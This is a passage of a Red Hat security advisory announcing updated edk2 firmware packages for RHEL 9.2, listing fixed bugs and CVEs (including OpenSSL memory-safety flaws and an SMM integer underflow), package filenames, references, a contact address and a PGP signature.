* openssl: double free after calling PEM_read_bio_ex (CVE-2022-4450)

* openssl: use-after-free following BIO_new_NDEF (CVE-2023-0215)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.2 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1960321 - CVE-2021-38578 edk2: integer underflow in SmmEntryPoint function leads to potential SMM privilege escalation  
1983086 - Assertion failure when creating 1024 VCPU VM: [...]UefiCpuPkg/CpuMpPei/CpuBist.c(186): !EFI_ERROR (Status)  
2125336 - Please add edk2-aarch64 and edk2-tools to CRB in RHEL 9  
2132951 - edk2: Sort traditional virtualization builds before Confidential Computing builds  
2157656 - [edk2] [aarch64] Unable to initialize EFI firmware when using edk2-aarch64-20221207gitfff6d81270b5-1.el9 in some hardwares  
2162307 - Broken GRUB output on a serial console  
2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName  
2164487 - CVE-2022-4304 openssl: timing attack in RSA Decryption implementation  
2164492 - CVE-2023-0215 openssl: use-after-free following BIO_new_NDEF  
2164494 - CVE-2022-4450 openssl: double free after calling PEM_read_bio_ex  
2168046 - [edk2] BIOS Release Date string is unexpected length  
2174605 - [EDK2] disable dynamic mmio window

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
edk2-20221207gitfff6d81270b5-9.el9_2.src.rpm

noarch:  
edk2-aarch64-20221207gitfff6d81270b5-9.el9_2.noarch.rpm  
edk2-ovmf-20221207gitfff6d81270b5-9.el9_2.noarch.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
edk2-debugsource-20221207gitfff6d81270b5-9.el9_2.aarch64.rpm  
edk2-tools-20221207gitfff6d81270b5-9.el9_2.aarch64.rpm  
edk2-tools-debuginfo-20221207gitfff6d81270b5-9.el9_2.aarch64.rpm

noarch:  
edk2-aarch64-20221207gitfff6d81270b5-9.el9_2.noarch.rpm  
edk2-ovmf-20221207gitfff6d81270b5-9.el9_2.noarch.rpm  
edk2-tools-doc-20221207gitfff6d81270b5-9.el9_2.noarch.rpm

x86_64:  
edk2-debugsource-20221207gitfff6d81270b5-9.el9_2.x86_64.rpm  
edk2-tools-20221207gitfff6d81270b5-9.el9_2.x86_64.rpm  
edk2-tools-debuginfo-20221207gitfff6d81270b5-9.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-38578  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFo0RNzjgjWX9erEAQg9NA/8DpTlXLXGvC02Zy7lUzgIfqQ3jT1yOsyS  
o8gP4PqZ2o2MthNJRM3WUq/oxobk4TMvDBTYaOTMF0N5gE7sFAM1gr8Jys4DknWn  
8NrruJ0ZvOF/5tzUC5KUqzu322o1oMGW/W4gmH8/DcPZLwrQjdWpuSVvIKaadnzw  
Ot9T6MHdalN0PaBnxVpu53G9gRLfQwRbXLu8FHBSlYxmiMjfPi2ki4Rg4FqKQrZ0  
BkfbZK17JmWxsYsI33e9d6DcRpPN8AxQrBN+rXv0WtzJClbQHi7qR9r5HAiTUIW6  
kChuaJXE79uglhAxtZllRWvPV2SfA5LDq75TUiHAC5rUoWBUqMi+hzpPhjNsGDz/  
QP7cTjpcs16cJlC7BGnN0NUEQr5fdYVOetJjJBv5wgCJGClmiDucrK9F/gNJIF+6  
SIiNQd+dje1dbbD//GxAot/WEiCrsxn2A5sGaWEyapeB8QJ6Js3is6EmpNc10LOt  
uSoko0yLttx7UJVzjkUTcH7PxpxaplBStcIAJi8Wj77nsAnrpiQORtNAGB0J+4rU  
pCb1XQlVSlgMlVfU+9jELIpvI8u7kkO1ss3sOaIvxTRycdXGgDXpX+IWQgNO732A  
4/R1FmdQNCKLm3XR03ukaYCFHMKLn3s2OqgZiAxWlO1+4VuGxyFd9bvwXCXoKuoa  
ZqW1JXNcdH8=Ml6L  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#mac